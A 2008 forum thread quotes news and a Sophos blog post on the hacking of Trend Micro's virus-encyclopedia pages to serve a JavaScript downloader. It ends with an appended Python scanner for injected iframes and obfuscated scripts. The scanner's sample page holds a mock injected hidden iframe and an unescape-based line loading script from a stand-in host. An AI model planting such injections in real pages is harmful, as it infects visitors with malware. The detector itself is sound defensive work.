

Trend Micro site infected users with Trojan




Posted by Frontpage1, 03-15-2008, 08:07 AM
Trend Micro site infected users with Trojan
Virus encyclopedia served up script-injection infection
March 13, 2008 (Computerworld)

Antivirus vendor Trend Micro Inc. confirmed Thursday that "some portions" of its site had been hacked earlier this week, but hedged when asked if those pages had been serving up attack code to unsuspecting visitors.

"I can't confirm or deny the details," said Mike Sweeny, a spokesman for the Tokyo-based security company, on Thursday afternoon. "Some pages were compromised, but we took those pages down and took corrective action hours ago." When pressed for more information, Sweeny would only say that the attack was "under analysis."

But media reports from Japan, and a blog post by a rival, U.K.-based Sophos Plc, offered more information. The English-language edition of the Yomiuri Shimbun, one of Japan's largest newspapers, said Trend Micro's site was hacked around 9:00 p.m. Sunday, Tokyo time (7:00 p.m. Eastern, on Saturday, in the U.S.). "When users viewed any of the modified pages, they were reconnected to other sites without realizing it, and a type of virus was installed on their computer that causes them to download other viruses in a series," said the Yomiuri Shimbun.

Security rival Sophos added more details late Thursday in a post to its blog. There, Graham Cluley, a Sophos senior security consultant, claimed that the hack had been an SQL injection attack and included a link to an alert Trend placed on its Japanese-language site that identified the malware as JS_DLOADER.TZE. The alert also said that users could have been infected by accessing one of 11 infected pages on the Japanese site or 20 pages on the English site, or by clicking a link embedded in the malware's name. All the pages were part of Trend Micro's malware encyclopedia, a searchable database of viruses, Trojans and worms. Sweeny, Trend's U.S. spokesman, said "about 32" pages were involved, "most of them from the encyclopedia."

Other reports speculated that the Trend Micro hack was part of the larger campaign that has infected some 20,000 pages in the past few days. According to researchers at McAfee Inc., those hacks are script-injection attacks that reference JavaScript attack code that in turn — and only after several cascading pages — leads to an executable piece of malware. McAfee's experts said the still-ongoing script-based attacks are similar to those that compromised the Web sites of both the Miami Dolphins NFL team and its Dolphin Stadium days before the 2007 Super Bowl.

Security vendors swung into action late Thursday with warnings of their own, even though information was in short supply. Symantec Corp., for example, warned customers of its DeepSight threat network of the reports of ongoing attacks. "Our honeypots are flooded with known attacks targeting older vulnerabilities in the same manner," wrote Patrick Jungles, a Symantec analyst, in the alert. "Although the attacks regularly observed by our honeynet may not all be directly related to this recent grouping, it shows that the attacks are successful enough that they warrant ongoing efforts to obtain new distribution servers."

The script-injection attack tracked by McAfee that may have struck Trend Micro's site is not the only mass infection currently plaguing users worldwide. Another campaign that began about a week ago has taken to subverting Web sites' search caches with rigged IFrames, then redirecting visitors to malicious sites that install malware. The infected-page tally for these IFrame attacks stands at more than 401,000, according to Dancho Danchev, the Bulgarian researcher who first reported the large-scale attack.

Although a warning had been posted on Trend Micro's Japanese-language site, as of 9 p.m. Eastern on Thursday, nothing similar was visible on the English edition.

http://www.computerworld.com/action/...icleId=9068478

Posted by LoganNZ, 03-15-2008, 08:15 AM
Nice find, that's a big screw-up on Trend Micro's business.

Posted by AmyWilliams, 03-15-2008, 10:47 AM
Am I the only one that finds it humorous that even the companies that are supposed to protect us can't even protect themselves?

Posted by bear, 03-15-2008, 10:55 AM
While there's a difference between protecting a PC and a server, yes, it's ironic.

Posted by Frontpage1, 03-16-2008, 09:04 AM
More info on the situation. I find it interesting that Trend Micro has been so quiet about the situation, as this severely damages their own credibility in the AV market, IMHO.

-------------

Anti-virus company Trend Micro: Our website has been hacked, risk of Trojan horse infection

If you have visited the website of anti-virus company Trend Micro this week there is a chance that your computer has been exposed to malware.

According to reports in the Japanese media, a number of webpages on the firm's Japanese and English-language website were altered by hackers on Sunday 9 March, who used a malicious iFrame exploit to deliver a Trojan horse onto surfers' computers.

Trend Micro is believed to have uncovered the problem on Wednesday 12 March and replaced affected pages with a message saying "This page is temporarily shut down for emergency maintenance" as the following image from the www.trendmicro.co.jp shows:

It has not yet been revealed how the webpages on the security website were altered by the hackers, although it is likely a software vulnerability on the site was exploited.

According to information posted on Trend Micro's website, the following analysis pages were compromised in Trend's Virus Info section: ADW_BRUNME.A, ADW_ZANGO.A, ADWARE_ADBLASTER, ADWARE_EXACTADVERTISING, ADWARE_EZULA.ILOOKUP, TSPY_AGENT.HS, TSPY_ANICMOO, TSPY_GOLDUN.GEN, TSPY_HUPIGON.ZY, TSPY_Lmir, TSPY_Tiny, ADWARE_BHO_WEBDIR, ADWARE_BHO_WSTART, HKTL_MDBEXP.A, POSSIBLE_OTORUN3, SPYWARE_TRAK_RADMIN, TROJ_ARTIEF-1, TROJ_CLAGGER.D, TSPY_BANKER-2.002, TSPY_BANKRYPT.N, TSPY_GAMANIA.CI, TSPY_GOLDUN.GEN, TSPY_LINEAGE, TSPY_ONLINEG.DAU, TSPY_ONLINEG.OAX, TSPY_QQPASS, TSPY_SDBOT.BTI, W97M_DLOADER.BKV, WORM_IRCBOT.JK, WORM_NYXEM.E and WORM_SOBER.AG.

Trend Micro reported on its website that web surfers could be infected by the malware, which they named JS_DLOADER.TZE, either by accessing one of the infected webpages or clicking a URL link embedded in the malware's name.

They have recommended that visitors to their site check that their computers are not infected. (Please note: At the time of writing we have only found a warning for customers on the Japanese-language version of Trend Micro's website, although we have confirmed that the English-language version was also infected.)

The JavaScript attempted to install further malicious code from the web onto visiting Windows computers. Sophos detects the malicious software associated with the attack as Mal/Iframe-F, Troj/Drop-I, and the Troj/Portles-E backdoor Trojan horse. Analysts have discovered thousands of other webpages (detected as Troj/Badsrc-A) on other websites that have been infected in the same way.

In a nutshell - what has happened here is a criminal act, and our friends at Trend Micro (and people visiting the hacked pages) are victims of the crime. Sadly it's not an uncommon crime these days - and all kinds of businesses have suffered. This isn't the time or place to make cheap shots against a competitor.

The good news is that Trend Micro took the affected webpages down as soon as they discovered there was a problem, and the problem no longer appears to exist.

All other companies with a web presence should take this unfortunate incident as an opportunity to check that their own websites are properly secured (see our recently published technical paper on the subject), and ensure that they have web-filtering solutions - like the WS1000 Web Appliance - in place.

Sophos discovers a new infected webpage every 14 seconds. In the past we've found websites as varied as Wedding Photographers, Antiques firms, Pilates Classes, Ice Cream Manufacturers and even the US Consulate General in St Petersburg who have been the unfortunate victims of a malicious web attack. It seems we now have to add anti-virus companies to that list.

PS. Trend Micro aren't the first example of a security company's website being hacked. For instance, in 1999 hackers changed the home page of Symantec - although in that instance the motivation was apparently to cause mischief rather than to spread malware.

Graham Cluley, Sophos
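Both articles quoted in this thread describe the same injection pattern: a compromised page gains a hidden IFrame or a script tag that pulls JavaScript from a third-party "distribution server", which then cascades through further pages to an executable. The following scanner is an added example written for this thread; it is not code from Computerworld, Sophos or Trend Micro. It walks a page's HTML with Python's standard-library parser and flags the three indicators a site owner would check their own pages for: IFrames that are hidden or point off-site, remote script tags from a foreign host, and inline scripts built from `unescape`/`eval`/`fromCharCode` obfuscation. The site host, the two sample pages and the `.invalid` domains in them are constructed for the example.

```python
"""Added example (not from the thread, Sophos or Trend Micro): flag injected
hidden IFrames and off-site or obfuscated scripts in a page's own HTML.
All hosts and sample pages below are constructed placeholders."""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Assumed host of the site being checked (placeholder, not a real vendor host).
SITE_HOST = "www.example-av-vendor.test"

# Inline-script constructs that mass-injection campaigns typically use to
# hide the real loader URL from casual inspection.
OBFUSCATION = re.compile(r"unescape\s*\(|\beval\s*\(|String\.fromCharCode", re.I)


def _is_hidden(attrs):
    """True for 0/1-pixel frames or frames styled out of view."""
    style = attrs.get("style", "").replace(" ", "").lower()
    width = attrs.get("width", "").strip().rstrip("px")
    height = attrs.get("height", "").strip().rstrip("px")
    tiny = width in {"0", "1"} or height in {"0", "1"}
    return (tiny or "display:none" in style
            or "visibility:hidden" in style or "left:-" in style)


def _is_offsite(src, site_host):
    """True when an absolute URL names a host other than the site's own."""
    host = urlparse(src).hostname
    return host is not None and host.lower() != site_host.lower()


class InjectionScanner(HTMLParser):
    """Collects (indicator, src, line) tuples while the page is parsed."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host
        self.findings = []
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        line = self.getpos()[0]
        if tag == "iframe" and (_is_hidden(a) or _is_offsite(src, self.site_host)):
            self.findings.append(("hidden_or_offsite_iframe", src, line))
        elif tag == "script":
            if src and _is_offsite(src, self.site_host):
                self.findings.append(("offsite_script", src, line))
            elif not src:
                self._in_inline_script = True  # inspect body in handle_data

    def handle_data(self, data):
        if self._in_inline_script and OBFUSCATION.search(data):
            self.findings.append(("obfuscated_inline_script", "", self.getpos()[0]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False


def scan_html(html, site_host=SITE_HOST):
    """Return the list of indicators found in one page's HTML."""
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: an untouched encyclopedia-style page (same-site script,
# visible same-site frame) and the same page with two injected elements.
CLEAN_PAGE = """<html><head><title>ADW_EXAMPLE.A - Virus Encyclopedia</title>
<script src="http://www.example-av-vendor.test/js/menu.js"></script></head>
<body><h1>ADW_EXAMPLE.A</h1><p>Adware description text.</p>
<iframe src="/ads/banner.html" width="300" height="100"></iframe></body></html>"""

INJECTED_PAGE = CLEAN_PAGE + """
<iframe src="http://bad-distribution-server.invalid/in.php" width=0 height=0 style="display:none"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://bad-distribution-server.invalid/x.js%22%3E%3C/script%3E'))</script>"""


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, scan_html(page))
```

Run against a crawl of your own site with `site_host` set to the real hostname; anything flagged is a page to compare against the last known-good copy in version control or backups, since a legitimately embedded third-party widget will also trigger the off-site checks and needs an allow-list.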


